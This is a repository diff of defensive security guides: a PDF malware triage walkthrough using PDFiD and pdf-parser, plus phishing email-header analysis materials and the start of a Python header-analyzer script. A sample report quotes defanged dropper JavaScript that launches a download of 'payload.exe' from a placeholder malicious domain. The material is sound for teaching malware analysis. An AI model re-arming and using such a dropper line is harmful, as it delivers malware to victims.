|
||||
---
|
||||
|
||||
# Analyzing PDF Malware with PDFiD
|
||||
|
||||
## When to Use
|
||||
|
||||
- A suspicious PDF attachment has been flagged by email security or reported by a user
|
||||
- You need to determine if a PDF contains embedded JavaScript, shellcode, or exploit code
|
||||
- Triaging PDF documents before opening them in a sandbox or analysis environment
|
||||
- Extracting embedded executables, scripts, or URLs from malicious PDF objects
|
||||
- Analyzing PDF exploit kits targeting Adobe Reader or other PDF viewer vulnerabilities
|
||||
|
||||
**Do not use** for analyzing the rendered visual content of a PDF; this is for structural analysis of the PDF file format for malicious objects.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.8+ with Didier Stevens' PDF tools installed (`pip install pdfid pdf-parser`)
|
||||
- peepdf installed for interactive PDF analysis (`pip install peepdf`)
|
||||
- pdftotext from poppler-utils for extracting text content safely
|
||||
- YARA with PDF-specific rules for malware family identification
|
||||
- Isolated analysis VM without a PDF reader installed (prevent accidental opening)
|
||||
- CyberChef for decoding embedded Base64, hex, or deflate streams
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Initial Triage with PDFiD
|
||||
|
||||
Scan the PDF for suspicious keywords and structures:
|
||||
|
||||
```bash
|
||||
# Run PDFiD to identify suspicious elements
|
||||
pdfid suspect.pdf
|
||||
|
||||
# Expected output analysis:
|
||||
# /JS - JavaScript (HIGH risk)
|
||||
# /JavaScript - JavaScript object (HIGH risk)
|
||||
# /AA - Auto-Action triggered on open (HIGH risk)
|
||||
# /OpenAction - Action on document open (HIGH risk)
|
||||
# /Launch - Launch external application (HIGH risk)
|
||||
# /EmbeddedFile - Embedded file (MEDIUM risk)
|
||||
# /RichMedia - Flash content (MEDIUM risk)
|
||||
# /ObjStm - Object stream (used for obfuscation)
|
||||
# /URI - URL reference (contextual risk)
|
||||
# /AcroForm - Interactive form (MEDIUM risk)
|
||||
|
||||
# Run with extra detail
|
||||
pdfid -e suspect.pdf
|
||||
|
||||
# Run with disarming (rename suspicious keywords)
|
||||
pdfid -d suspect.pdf
|
||||
```
|
||||
|
||||
```
|
||||
PDFiD Risk Assessment:
|
||||
━━━━━━━━━━━━━━━━━━━━━
|
||||
HIGH RISK indicators (any count > 0):
|
||||
/JS, /JavaScript -> Embedded JavaScript code
|
||||
/AA -> Automatic Action (triggers without user interaction)
|
||||
/OpenAction -> Code runs when document is opened
|
||||
/Launch -> Can launch external executables
|
||||
/JBIG2Decode -> Associated with CVE-2009-0658 exploit
|
||||
|
||||
MEDIUM RISK indicators:
|
||||
/EmbeddedFile -> Contains embedded files (could be EXE/DLL)
|
||||
/RichMedia -> Flash/multimedia (Flash exploits)
|
||||
/AcroForm -> Form with possible submit action
|
||||
/XFA -> XML Forms Architecture (complex attack surface)
|
||||
|
||||
LOW RISK indicators:
|
||||
/ObjStm -> Object streams (obfuscation technique)
|
||||
/URI -> External URL references
|
||||
/Page -> Number of pages (context only)
|
||||
```
|
||||
|
||||
### Step 2: Parse PDF Structure with pdf-parser
|
||||
|
||||
Examine suspicious objects identified by PDFiD:
|
||||
|
||||
```bash
|
||||
# List all objects referencing JavaScript
|
||||
pdf-parser --search "/JavaScript" suspect.pdf
|
||||
pdf-parser --search "/JS" suspect.pdf
|
||||
|
||||
# List all objects with OpenAction
|
||||
pdf-parser --search "/OpenAction" suspect.pdf
|
||||
|
||||
# Extract a specific object by ID (example: object 5)
|
||||
pdf-parser --object 5 suspect.pdf
|
||||
|
||||
# Extract and decompress stream content
|
||||
pdf-parser --object 5 --filter --raw suspect.pdf
|
||||
|
||||
# Search for embedded files
|
||||
pdf-parser --search "/EmbeddedFile" suspect.pdf
|
||||
|
||||
# List all objects with their types
|
||||
pdf-parser --stats suspect.pdf
|
||||
```
|
||||
|
||||
### Step 3: Extract and Analyze Embedded JavaScript
|
||||
|
||||
Pull out JavaScript code from PDF objects:
|
||||
|
||||
```bash
|
||||
# Extract JavaScript using pdf-parser
|
||||
pdf-parser --search "/JS" --raw --filter suspect.pdf > extracted_js.txt
|
||||
|
||||
# Alternative: Use peepdf for interactive JavaScript extraction
|
||||
peepdf -f -i suspect.pdf << 'EOF'
|
||||
js_analyse
|
||||
EOF
|
||||
|
||||
# peepdf interactive commands for JS analysis:
|
||||
# js_analyse - Extract and show all JavaScript code
|
||||
# js_beautify - Format extracted JavaScript
|
||||
# js_eval <object> - Evaluate JavaScript in sandboxed environment
|
||||
# object <id> - Display object content
|
||||
# rawobject <id> - Display raw object bytes
|
||||
# stream <id> - Display decompressed stream
|
||||
# offsets - Show object offsets in file
|
||||
```
|
||||
|
||||
```python
|
||||
# Python script for comprehensive PDF JavaScript extraction
|
||||
import subprocess
|
||||
import re
|
||||
|
||||
# Extract all streams and search for JavaScript
|
||||
result = subprocess.run(
|
||||
["pdf-parser", "--stats", "suspect.pdf"],
|
||||
capture_output=True, text=True
|
||||
)
|
||||
|
||||
# Find object IDs containing JavaScript references
|
||||
js_objects = []
|
||||
for line in result.stdout.split('\n'):
|
||||
if '/JavaScript' in line or '/JS' in line:
|
||||
obj_id = re.search(r'obj (\d+)', line)
|
||||
if obj_id:
|
||||
js_objects.append(obj_id.group(1))
|
||||
|
||||
# Extract each JavaScript-containing object
|
||||
for obj_id in js_objects:
|
||||
result = subprocess.run(
|
||||
["pdf-parser", "--object", obj_id, "--filter", "--raw", "suspect.pdf"],
|
||||
capture_output=True, text=True
|
||||
)
|
||||
print(f"\n=== Object {obj_id} ===")
|
||||
print(result.stdout[:2000])
|
||||
```
|
||||
|
||||
### Step 4: Analyze Embedded Shellcode
|
||||
|
||||
Extract and examine shellcode from PDF exploits:
|
||||
|
||||
```bash
|
||||
# Extract raw stream data for shellcode analysis
|
||||
pdf-parser --object 7 --filter --raw --dump shellcode.bin suspect.pdf
|
||||
|
||||
# Analyze shellcode with scdbg (shellcode debugger)
|
||||
scdbg /f shellcode.bin
|
||||
|
||||
# Alternative: Use speakeasy for shellcode emulation
|
||||
python3 -c "
|
||||
import speakeasy
|
||||
|
||||
se = speakeasy.Speakeasy()
|
||||
sc_addr = se.load_shellcode('shellcode.bin', arch='x86')
|
||||
se.run_shellcode(sc_addr, count=1000)
|
||||
|
||||
# Review API calls made by shellcode
|
||||
for event in se.get_report()['api_calls']:
|
||||
print(f\"{event['api']}: {event['args']}\")
|
||||
"
|
||||
|
||||
# Use CyberChef to decode hex/base64 encoded shellcode
|
||||
# Input: Extracted stream data
|
||||
# Recipe: From Hex -> Disassemble x86
|
||||
```
|
||||
|
||||
### Step 5: Extract Embedded Files and URLs
|
||||
|
||||
Pull out embedded executables and linked resources:
|
||||
|
||||
```python
|
||||
# Extract embedded files from PDF
|
||||
import subprocess
|
||||
import hashlib
|
||||
|
||||
# Find embedded file objects
|
||||
result = subprocess.run(
|
||||
["pdf-parser", "--search", "/EmbeddedFile", "--raw", "--filter", "suspect.pdf"],
|
||||
capture_output=True
|
||||
)
|
||||
|
||||
# Extract embedded PE files by searching for MZ header
|
||||
with open("suspect.pdf", "rb") as f:
|
||||
data = f.read()
|
||||
|
||||
# Search for embedded PE files
|
||||
offset = 0
|
||||
while True:
|
||||
pos = data.find(b'MZ', offset)
|
||||
if pos == -1:
|
||||
break
|
||||
# Verify PE signature
|
||||
if pos + 0x3C < len(data):
|
||||
pe_offset = int.from_bytes(data[pos+0x3C:pos+0x40], 'little')
|
||||
if pos + pe_offset + 2 < len(data) and data[pos+pe_offset:pos+pe_offset+2] == b'PE':
|
||||
print(f"Embedded PE found at offset 0x{pos:X}")
|
||||
# Extract (estimate size or use PE header)
|
||||
embedded = data[pos:pos+100000] # Initial extraction
|
||||
sha256 = hashlib.sha256(embedded).hexdigest()
|
||||
with open(f"embedded_{pos:X}.exe", "wb") as out:
|
||||
out.write(embedded)
|
||||
print(f" SHA-256: {sha256}")
|
||||
offset = pos + 1
|
||||
|
||||
# Extract URLs from PDF
|
||||
result = subprocess.run(
|
||||
["pdf-parser", "--search", "/URI", "--raw", "suspect.pdf"],
|
||||
capture_output=True, text=True
|
||||
)
|
||||
urls = re.findall(r'(https?://[^\s<>"]+)', result.stdout)
|
||||
for url in set(urls):
|
||||
print(f"URL: {url}")
|
||||
```
|
||||
|
||||
### Step 6: Generate Analysis Report
|
||||
|
||||
Document all findings from the PDF analysis:
|
||||
|
||||
```
|
||||
Analysis should cover:
|
||||
- PDFiD triage results (suspicious keyword counts)
|
||||
- PDF structure anomalies (object streams, cross-reference issues)
|
||||
- Extracted JavaScript code (deobfuscated if needed)
|
||||
- Shellcode analysis results (API calls, network indicators)
|
||||
- Embedded files extracted with hashes
|
||||
- URLs and external references
|
||||
- CVE identification if a known exploit is detected
|
||||
- YARA rule matches against known PDF malware families
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **PDF Object** | Basic building block of a PDF file; objects can contain streams (compressed data), dictionaries, arrays, and references to other objects |
|
||||
| **OpenAction** | PDF dictionary entry specifying an action to execute when the document is opened; commonly used to trigger JavaScript exploits |
|
||||
| **PDF Stream** | Compressed data within a PDF object that can contain JavaScript, images, embedded files, or shellcode; typically FlateDecode compressed |
|
||||
| **FlateDecode** | Zlib/deflate compression filter applied to PDF streams; must be decompressed to analyze contents |
|
||||
| **ObjStm (Object Stream)** | PDF feature storing multiple objects within a single compressed stream; used by malware to hide suspicious objects from simple parsers |
|
||||
| **JBIG2** | Image compression standard in PDFs; historical source of exploits (CVE-2009-0658, CVE-2021-30860 FORCEDENTRY) |
|
||||
| **PDF JavaScript API** | Adobe-specific JavaScript extensions available in PDF documents for form manipulation, network access, and OS interaction |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **PDFiD**: Didier Stevens' tool for scanning PDF documents for suspicious keywords and structures without parsing the full document
|
||||
- **pdf-parser**: Companion tool to PDFiD for detailed PDF object extraction, stream decompression, and content analysis
|
||||
- **peepdf**: Python-based PDF analysis tool providing interactive shell for object inspection and JavaScript extraction
|
||||
- **QPDF**: PDF transformation tool for linearizing, decrypting, and restructuring PDFs for easier analysis
|
||||
- **scdbg**: Shellcode analysis tool that emulates x86 shellcode execution and logs API calls
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Triaging a Phishing PDF with Embedded JavaScript
|
||||
|
||||
**Context**: Email gateway flagged a PDF attachment with suspicious JavaScript indicators. The security team needs to determine if it contains an exploit or a social engineering redirect.
|
||||
|
||||
**Approach**:
|
||||
1. Run PDFiD to confirm /JS, /JavaScript, and /OpenAction presence and counts
|
||||
2. Use pdf-parser to extract the OpenAction object and follow its reference chain
|
||||
3. Extract the JavaScript code from the referenced stream object (apply FlateDecode filter)
|
||||
4. Deobfuscate the JavaScript (decode hex strings, resolve eval chains)
|
||||
5. Determine if the script exploits a PDF reader vulnerability (check for heap spray, ROP chains) or performs a redirect
|
||||
6. Extract all URLs, IPs, and embedded files as IOCs
|
||||
7. Classify the sample: exploit (specific CVE) or social engineering (redirect/phishing)
|
||||
|
||||
**Pitfalls**:
|
||||
- Opening the PDF in a standard reader instead of analyzing it with command-line tools
|
||||
- Missing JavaScript hidden inside Object Streams (/ObjStm) that PDFiD detects but simple parsers miss
|
||||
- Not decompressing streams before analysis (FlateDecode, ASCIIHexDecode, ASCII85Decode filters)
|
||||
- Assuming the absence of /JS means no JavaScript; code can be embedded in form fields (/AcroForm with /XFA)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
PDF MALWARE ANALYSIS REPORT
|
||||
==============================
|
||||
File: invoice_2025.pdf
|
||||
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
|
||||
File Size: 45,312 bytes
|
||||
PDF Version: 1.7
|
||||
|
||||
PDFID TRIAGE
|
||||
/JS: 1 [HIGH RISK]
|
||||
/JavaScript: 1 [HIGH RISK]
|
||||
/OpenAction: 1 [HIGH RISK]
|
||||
/EmbeddedFile: 0
|
||||
/Launch: 0
|
||||
/URI: 2
|
||||
/Page: 1
|
||||
/ObjStm: 1 [OBFUSCATION]
|
||||
|
||||
SUSPICIOUS OBJECTS
|
||||
Object 5: /OpenAction -> references Object 8
|
||||
Object 8: /JavaScript stream (FlateDecode, 2,847 bytes decompressed)
|
||||
Object 12: /ObjStm containing objects 15-18
|
||||
|
||||
EXTRACTED JAVASCRIPT
|
||||
Layer 1: eval(unescape("%68%65%6C%6C%6F"))
|
||||
Layer 2: var url = "hxxp://malicious[.]com/payload.exe";
|
||||
app.launchURL(url, true);
|
||||
// Social engineering redirect, not exploit
|
||||
|
||||
EXTRACTED IOCs
|
||||
URLs: hxxp://malicious[.]com/payload.exe
|
||||
hxxps://fake-login[.]com/adobe/verify
|
||||
Domains: malicious[.]com, fake-login[.]com
|
||||
|
||||
CLASSIFICATION
|
||||
Type: Social Engineering (URL redirect)
|
||||
CVE: None (no exploit code detected)
|
||||
Risk: HIGH (downloads executable payload)
|
||||
Family: Generic PDF Dropper
|
||||
```
|
||||
@@ -0,0 +1,78 @@
|
||||
---
|
||||
name: analyzing-phishing-email-headers
|
||||
description: Email headers contain critical metadata that reveals the true origin, routing path, and authentication status of emails. Analyzing these headers is a foundational skill for identifying phishing attemp
|
||||
domain: cybersecurity
|
||||
subdomain: phishing-defense
|
||||
tags: [phishing, email-security, social-engineering, dmarc, awareness, header-analysis, forensics]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Phishing Email Headers
|
||||
|
||||
## Overview
|
||||
Email headers contain critical metadata that reveals the true origin, routing path, and authentication status of emails. Analyzing these headers is a foundational skill for identifying phishing attempts, verifying sender authenticity, and gathering threat intelligence. This skill covers systematic extraction and interpretation of email headers using both manual techniques and automated tools.
|
||||
|
||||
## Prerequisites
|
||||
- Basic understanding of SMTP protocol and email delivery
|
||||
- Familiarity with DNS records (MX, TXT, SPF, DKIM, DMARC)
|
||||
- Python 3.8+ installed
|
||||
- Access to email client that can export raw headers (Outlook, Gmail, Thunderbird)
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Critical Header Fields
|
||||
1. **Received**: Chain of mail servers the message passed through (read bottom to top)
|
||||
2. **From / Return-Path / Reply-To**: Sender identity fields (often spoofed)
|
||||
3. **Authentication-Results**: SPF, DKIM, DMARC verification outcomes
|
||||
4. **X-Originating-IP**: Original sender IP address
|
||||
5. **Message-ID**: Unique identifier; anomalies indicate spoofing
|
||||
6. **X-Mailer / User-Agent**: Email client used to compose the message
|
||||
|
||||
### Red Flags in Headers
|
||||
- Mismatched `From` and `Return-Path` domains
|
||||
- SPF/DKIM/DMARC failures in `Authentication-Results`
|
||||
- Suspicious `Received` chains with unfamiliar relay servers
|
||||
- `X-Originating-IP` from unexpected geographies
|
||||
- Missing or malformed `Message-ID`
|
||||
- Unusual `X-Mailer` values (e.g., mass-mailing tools)
|
||||
|
||||
## Implementation Steps
|
||||
|
||||
### Step 1: Extract Raw Email Headers
|
||||
```
|
||||
Gmail: Open email -> Three dots -> "Show original"
|
||||
Outlook: Open email -> File -> Properties -> Internet Headers
|
||||
Thunderbird: View -> Message Source (Ctrl+U)
|
||||
```
|
||||
|
||||
### Step 2: Parse Headers with Python
|
||||
Use the `scripts/process.py` script to automate header analysis including IP geolocation, authentication validation, and anomaly detection.
|
||||
|
||||
### Step 3: Validate Authentication Chain
|
||||
- Check SPF alignment: Does the sending IP match the domain's SPF record?
|
||||
- Check DKIM signature: Is the cryptographic signature valid?
|
||||
- Check DMARC policy: Does the message pass DMARC alignment?
|
||||
|
||||
### Step 4: Trace Mail Route
|
||||
- Read `Received` headers from bottom to top
|
||||
- Map each hop's IP to organization/location
|
||||
- Identify unexpected relays or delays
|
||||
|
||||
### Step 5: Correlate with Threat Intelligence
|
||||
- Look up originating IP on AbuseIPDB, VirusTotal
|
||||
- Check sending domain age on WHOIS
|
||||
- Search for known phishing infrastructure patterns
|
||||
|
||||
## Tools & Resources
|
||||
- **MXToolbox Header Analyzer**: https://mxtoolbox.com/EmailHeaders.aspx
|
||||
- **Google Admin Toolbox**: https://toolbox.googleapps.com/apps/messageheader/
|
||||
- **AbuseIPDB**: https://www.abuseipdb.com/
|
||||
- **VirusTotal**: https://www.virustotal.com/
|
||||
- **PhishTank**: https://phishtank.org/
|
||||
|
||||
## Validation
|
||||
- Successfully parse headers from 3 different email providers
|
||||
- Correctly identify authentication pass/fail status
|
||||
- Accurately trace email routing path
|
||||
- Detect at least 3 phishing indicators in a sample phishing email
|
||||
@@ -0,0 +1,86 @@
|
||||
# Phishing Email Header Analysis Report Template
|
||||
|
||||
## Report Information
|
||||
- **Analyst**: [Name]
|
||||
- **Date**: [YYYY-MM-DD]
|
||||
- **Case ID**: [CASE-XXXX]
|
||||
- **Classification**: [Phishing / Spear-phishing / BEC / Legitimate]
|
||||
|
||||
## Email Summary
|
||||
| Field | Value |
|
||||
|---|---|
|
||||
| From | |
|
||||
| To | |
|
||||
| Subject | |
|
||||
| Date Received | |
|
||||
| Message-ID | |
|
||||
|
||||
## Authentication Results
|
||||
| Check | Result | Domain | Notes |
|
||||
|---|---|---|---|
|
||||
| SPF | pass/fail/none | | |
|
||||
| DKIM | pass/fail/none | | |
|
||||
| DMARC | pass/fail/none | | |
|
||||
|
||||
## Sender Analysis
|
||||
| Field | Value | Match From? |
|
||||
|---|---|---|
|
||||
| From (header) | | N/A |
|
||||
| Return-Path (envelope) | | Yes/No |
|
||||
| Reply-To | | Yes/No |
|
||||
| X-Originating-IP | | |
|
||||
| X-Mailer | | |
|
||||
|
||||
## Routing Analysis
|
||||
| Hop | Server From | Server By | IP | Location | Time |
|
||||
|---|---|---|---|---|---|
|
||||
| 1 | | | | | |
|
||||
| 2 | | | | | |
|
||||
| 3 | | | | | |
|
||||
|
||||
## Indicators of Compromise (IOCs)
|
||||
### IP Addresses
|
||||
| IP | Source | Reputation | Location |
|
||||
|---|---|---|---|
|
||||
| | | | |
|
||||
|
||||
### Domains
|
||||
| Domain | Source | Age | Reputation |
|
||||
|---|---|---|---|
|
||||
| | | | |
|
||||
|
||||
### URLs
|
||||
| URL | Context | Status |
|
||||
|---|---|---|
|
||||
| | | |
|
||||
|
||||
## Phishing Indicators Found
|
||||
| # | Category | Description | Severity |
|
||||
|---|---|---|---|
|
||||
| 1 | | | |
|
||||
| 2 | | | |
|
||||
| 3 | | | |
|
||||
|
||||
## Risk Assessment
|
||||
- **Risk Score**: [0-100]
|
||||
- **Risk Level**: [CLEAN / LOW / MEDIUM / HIGH / CRITICAL]
|
||||
- **Confidence**: [Low / Medium / High]
|
||||
|
||||
## Recommended Actions
|
||||
- [ ] Block sender domain at email gateway
|
||||
- [ ] Add originating IP to blocklist
|
||||
- [ ] Submit IOCs to threat intelligence platform
|
||||
- [ ] Notify affected users
|
||||
- [ ] Check for similar messages in mail logs
|
||||
- [ ] Update email filtering rules
|
||||
- [ ] Report to anti-phishing databases (PhishTank, APWG)
|
||||
|
||||
## Evidence Chain
|
||||
| Item | Hash (SHA-256) | Description |
|
||||
|---|---|---|
|
||||
| Original .eml | | Raw email file |
|
||||
| Headers export | | Extracted headers |
|
||||
| Screenshots | | Visual evidence |
|
||||
|
||||
## Notes
|
||||
[Additional observations, context, or analysis notes]
|
||||
@@ -0,0 +1,42 @@
|
||||
# Standards & References: Analyzing Phishing Email Headers
|
||||
|
||||
## RFC Standards
|
||||
- **RFC 5321 (SMTP)**: Simple Mail Transfer Protocol - defines how email is transmitted and the structure of Received headers
|
||||
- **RFC 5322 (Internet Message Format)**: Defines the syntax of email header fields including From, To, Date, Message-ID
|
||||
- **RFC 7208 (SPF)**: Sender Policy Framework - mechanism for validating email sender IP against domain policy
|
||||
- **RFC 6376 (DKIM)**: DomainKeys Identified Mail - cryptographic authentication of email messages
|
||||
- **RFC 7489 (DMARC)**: Domain-based Message Authentication, Reporting and Conformance
|
||||
- **RFC 8601 (Authentication-Results)**: Message Header Field for Indicating Message Authentication Status
|
||||
|
||||
## NIST Guidelines
|
||||
- **NIST SP 800-177 Rev.1**: Trustworthy Email - comprehensive guide to email security including header authentication
|
||||
- **NIST SP 800-45 Ver.2**: Guidelines on Electronic Mail Security
|
||||
|
||||
## MITRE ATT&CK References
|
||||
- **T1566.001**: Phishing: Spearphishing Attachment
|
||||
- **T1566.002**: Phishing: Spearphishing Link
|
||||
- **T1566.003**: Phishing: Spearphishing via Service
|
||||
- **T1534**: Internal Spearphishing
|
||||
|
||||
## Industry Standards
|
||||
- **M3AAWG Best Practices**: Messaging, Malware and Mobile Anti-Abuse Working Group email authentication recommendations
|
||||
- **DMARC.org**: Industry consortium for DMARC deployment guidance
|
||||
- **Anti-Phishing Working Group (APWG)**: Phishing Activity Trends Reports
|
||||
|
||||
## Key Header Fields Reference
|
||||
|
||||
| Header Field | RFC | Purpose |
|
||||
|---|---|---|
|
||||
| Received | RFC 5321 | Records each SMTP hop |
|
||||
| From | RFC 5322 | Display sender address |
|
||||
| Return-Path | RFC 5321 | Envelope sender (bounce address) |
|
||||
| Authentication-Results | RFC 8601 | SPF/DKIM/DMARC results |
|
||||
| DKIM-Signature | RFC 6376 | Cryptographic signature |
|
||||
| Message-ID | RFC 5322 | Unique message identifier |
|
||||
| X-Originating-IP | Non-standard | Sender's IP (provider-specific) |
|
||||
| X-Mailer | Non-standard | Email client identification |
|
||||
|
||||
## Compliance Frameworks
|
||||
- **PCI DSS 4.0**: Requirement 5 - Protect All Systems and Networks from Malicious Software
|
||||
- **ISO 27001:2022**: A.8.23 - Web filtering; A.5.14 - Information transfer
|
||||
- **SOC 2**: CC6.1 - Logical and Physical Access Controls
|
||||
@@ -0,0 +1,89 @@
|
||||
# Workflows: Analyzing Phishing Email Headers
|
||||
|
||||
## Workflow 1: Rapid Header Triage
|
||||
|
||||
```
|
||||
START: Suspicious email reported
|
||||
|
|
||||
v
|
||||
[Extract raw headers from email client]
|
||||
|
|
||||
v
|
||||
[Check Authentication-Results header]
|
||||
|
|
||||
+-- SPF=pass, DKIM=pass, DMARC=pass --> Lower suspicion, check content
|
||||
|
|
||||
+-- Any FAIL --> High suspicion
|
||||
|
|
||||
v
|
||||
[Compare From vs Return-Path vs Reply-To]
|
||||
|
|
||||
+-- All match --> Check Received chain
|
||||
+-- Mismatch --> LIKELY PHISHING - escalate
|
||||
|
|
||||
v
|
||||
[Document findings, block sender, alert SOC]
|
||||
```
|
||||
|
||||
## Workflow 2: Full Header Forensic Analysis
|
||||
|
||||
### Phase 1: Collection
|
||||
1. Obtain raw email source (.eml file or copy full headers)
|
||||
2. Preserve original message with headers as evidence
|
||||
3. Calculate hash of original .eml file for chain of custody
|
||||
|
||||
### Phase 2: Authentication Analysis
|
||||
1. Extract SPF result from Authentication-Results
|
||||
2. Verify SPF by querying sender domain's TXT record: `dig TXT _spf.example.com`
|
||||
3. Extract DKIM result and verify signature domain
|
||||
4. Check DMARC alignment (identifier alignment between SPF/DKIM and From domain)
|
||||
5. Document all authentication pass/fail results
|
||||
|
||||
### Phase 3: Route Analysis
|
||||
1. Parse all Received headers (bottom to top)
|
||||
2. For each hop:
|
||||
- Extract server hostname and IP
|
||||
- Note timestamp
|
||||
- Calculate time delta between hops
|
||||
3. Flag any:
|
||||
- Unexpected relay servers
|
||||
- Geographic anomalies (IP in unexpected country)
|
||||
- Excessive delays (possible queuing for mass send)
|
||||
- Internal-only hostnames appearing in external mail
|
||||
|
||||
### Phase 4: Sender Investigation
|
||||
1. WHOIS lookup on sending domain
|
||||
- Domain age < 30 days = high risk
|
||||
- Registrar known for abuse = medium risk
|
||||
2. Reverse DNS on originating IP
|
||||
3. AbuseIPDB / VirusTotal lookup on originating IP
|
||||
4. Check if sending domain appears in known phishing feeds
|
||||
|
||||
### Phase 5: Indicator Extraction
|
||||
1. Extract all URLs from message body and headers
|
||||
2. Extract all IP addresses from Received chain
|
||||
3. Extract domain names from all relevant fields
|
||||
4. Create IOC list for threat intelligence platform
|
||||
|
||||
## Workflow 3: Automated Pipeline
|
||||
|
||||
```
|
||||
Email received --> MTA logs header -->
|
||||
SIEM ingestion -->
|
||||
Automated header parsing -->
|
||||
Authentication check -->
|
||||
IF fail: Create alert + enrich with TI -->
|
||||
SOC analyst review -->
|
||||
Confirm/dismiss -->
|
||||
IF confirmed: Block + hunt similar
|
||||
```
|
||||
|
||||
## Decision Matrix
|
||||
|
||||
| Authentication | Route | Sender Rep | Action |
|
||||
|---|---|---|---|
|
||||
| All Pass | Normal | Good | Deliver normally |
|
||||
| SPF Fail | Normal | Good | Quarantine, investigate |
|
||||
| DKIM Fail | Normal | Unknown | Quarantine, investigate |
|
||||
| DMARC Fail | Anomalous | Bad | Block, create IOC |
|
||||
| All Fail | Anomalous | Bad | Block, escalate, hunt |
|
||||
@@ -0,0 +1,566 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Phishing Email Header Analyzer
|
||||
|
||||
Parses raw email headers to extract authentication results, routing information,
|
||||
and phishing indicators. Performs IP geolocation, domain age checks, and
|
||||
generates a risk assessment report.
|
||||
|
||||
Usage:
|
||||
python process.py --file email_headers.txt
|
||||
python process.py --eml suspicious_email.eml
|
||||
python process.py --stdin < headers.txt
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import email
|
||||
import re
|
||||
import json
|
||||
import sys
|
||||
import socket
|
||||
import hashlib
|
||||
from datetime import datetime, timezone
|
||||
from email import policy
|
||||
from email.parser import HeaderParser, BytesParser
|
||||
from pathlib import Path
|
||||
from typing import Optional
|
||||
from dataclasses import dataclass, field, asdict
|
||||
|
||||
try:
|
||||
import requests
|
||||
HAS_REQUESTS = True
|
||||
except ImportError:
|
||||
HAS_REQUESTS = False
|
||||
|
||||
|
||||
@dataclass
|
||||
class ReceivedHop:
|
||||
"""Represents a single hop in the email routing chain."""
|
||||
server_from: str = ""
|
||||
server_by: str = ""
|
||||
ip_address: str = ""
|
||||
timestamp: str = ""
|
||||
protocol: str = ""
|
||||
hop_number: int = 0
|
||||
geo_location: str = ""
|
||||
reverse_dns: str = ""
|
||||
|
||||
|
||||
@dataclass
|
||||
class AuthenticationResult:
|
||||
"""Email authentication check results."""
|
||||
spf: str = "none"
|
||||
spf_domain: str = ""
|
||||
dkim: str = "none"
|
||||
dkim_domain: str = ""
|
||||
dmarc: str = "none"
|
||||
dmarc_domain: str = ""
|
||||
compauth: str = ""
|
||||
|
||||
|
||||
@dataclass
|
||||
class PhishingIndicator:
|
||||
"""A single phishing indicator found in headers."""
|
||||
category: str = ""
|
||||
description: str = ""
|
||||
severity: str = "low" # low, medium, high, critical
|
||||
raw_value: str = ""
|
||||
|
||||
|
||||
@dataclass
|
||||
class HeaderAnalysis:
|
||||
"""Complete header analysis results."""
|
||||
message_id: str = ""
|
||||
from_address: str = ""
|
||||
from_domain: str = ""
|
||||
return_path: str = ""
|
||||
return_path_domain: str = ""
|
||||
reply_to: str = ""
|
||||
reply_to_domain: str = ""
|
||||
subject: str = ""
|
||||
date: str = ""
|
||||
x_originating_ip: str = ""
|
||||
x_mailer: str = ""
|
||||
received_hops: list = field(default_factory=list)
|
||||
authentication: AuthenticationResult = field(default_factory=AuthenticationResult)
|
||||
indicators: list = field(default_factory=list)
|
||||
risk_score: int = 0
|
||||
risk_level: str = "unknown"
|
||||
urls_in_headers: list = field(default_factory=list)
|
||||
file_hash: str = ""
|
||||
|
||||
|
||||
def extract_ip_from_received(received_value: str) -> str:
|
||||
"""Extract IP address from a Received header value."""
|
||||
ip_patterns = [
|
||||
r'\[(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\]',
|
||||
r'\((\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\)',
|
||||
r'from\s+\S+\s+\(.*?(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})',
|
||||
]
|
||||
for pattern in ip_patterns:
|
||||
match = re.search(pattern, received_value)
|
||||
if match:
|
||||
ip = match.group(1)
|
||||
if not ip.startswith(('10.', '172.16.', '172.17.', '172.18.',
|
||||
'172.19.', '172.2', '172.30.', '172.31.',
|
||||
'192.168.', '127.')):
|
||||
return ip
|
||||
return ""
|
||||
|
||||
|
||||
def extract_domain(email_address: str) -> str:
|
||||
"""Extract domain from an email address."""
|
||||
if not email_address:
|
||||
return ""
|
||||
match = re.search(r'@([\w.-]+)', email_address)
|
||||
return match.group(1).lower() if match else ""
|
||||
|
||||
|
||||
def parse_received_header(received_value: str, hop_num: int) -> ReceivedHop:
|
||||
"""Parse a single Received header into structured data."""
|
||||
hop = ReceivedHop(hop_number=hop_num)
|
||||
|
||||
from_match = re.search(r'from\s+([\w.\-]+)', received_value, re.IGNORECASE)
|
||||
if from_match:
|
||||
hop.server_from = from_match.group(1)
|
||||
|
||||
by_match = re.search(r'by\s+([\w.\-]+)', received_value, re.IGNORECASE)
|
||||
if by_match:
|
||||
hop.server_by = by_match.group(1)
|
||||
|
||||
hop.ip_address = extract_ip_from_received(received_value)
|
||||
|
||||
date_match = re.search(r';\s*(.+)$', received_value)
|
||||
if date_match:
|
||||
hop.timestamp = date_match.group(1).strip()
|
||||
|
||||
proto_match = re.search(r'with\s+(ESMTP[SA]*|SMTP[SA]*|HTTP[S]?|LMTP)',
|
||||
received_value, re.IGNORECASE)
|
||||
if proto_match:
|
||||
hop.protocol = proto_match.group(1).upper()
|
||||
|
||||
return hop
|
||||
|
||||
|
||||
def parse_authentication_results(auth_header: str) -> AuthenticationResult:
|
||||
"""Parse Authentication-Results header."""
|
||||
result = AuthenticationResult()
|
||||
|
||||
spf_match = re.search(r'spf=(pass|fail|softfail|neutral|none|temperror|permerror)',
|
||||
auth_header, re.IGNORECASE)
|
||||
if spf_match:
|
||||
result.spf = spf_match.group(1).lower()
|
||||
|
||||
